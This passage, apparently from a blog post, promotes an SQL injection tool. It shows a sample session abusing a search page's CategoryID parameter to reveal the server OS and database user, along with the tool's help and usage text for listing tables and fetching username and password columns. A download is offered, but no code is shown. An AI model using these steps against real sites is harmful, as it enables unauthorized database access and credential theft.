Once you successfully inject into database, it spawns a shell. This is one of another good features which I like.
Some Sample testing
[*] URL to process: http://www.exam.com/catalog/Search.asp[*] Abusing ‘CategoryID’…
[+] OS version: Windows NT 5.2 (Build 3790: Service Pack 2)
[+] Current user: dbo
unknown_db.table> help
sqliinjection interactive session help
exit / quit - leave sqli
discover databases / discover dbs - discover all databases on system
discover tables - discover all tables on system
discover columns - discover all columns in current table
select db/database [name] - change context to database [name]
select table [name] - change context to table [name]
fetch n,..,x - fetch data from columns n, etc. (i.e. fetch username,password).
usage: sqlidiscover [-G|-P] [-v] [-b] [-phostnameort] [-cCookieName:CookieValue] [-avarname1=value1,...,varname2=value2] [-ivarname] URL
-G - use GET method
-P - use POST method
-a - additional variables i.e. -aaction=create,cid=12
-b - bypass SQL, OS version and current user check
-i - variable to screw with i.e. -itxtPassword
-v - verbose
URL - http://vulnarable/file.asp
-p - use http/https proxy, format hostnameort i.e. -pourproxy.com:8080
-c - use browser cookie, format name:value i.e. -cASPSESSIONID:LCACPKILKFN
Download Sqlidiscover Here:
Code:
................................................................................................................................................... .........................................................
............................................................................................................................................................................................................
..............................................................................................................................................................................................................
0 comments:
Post a Comment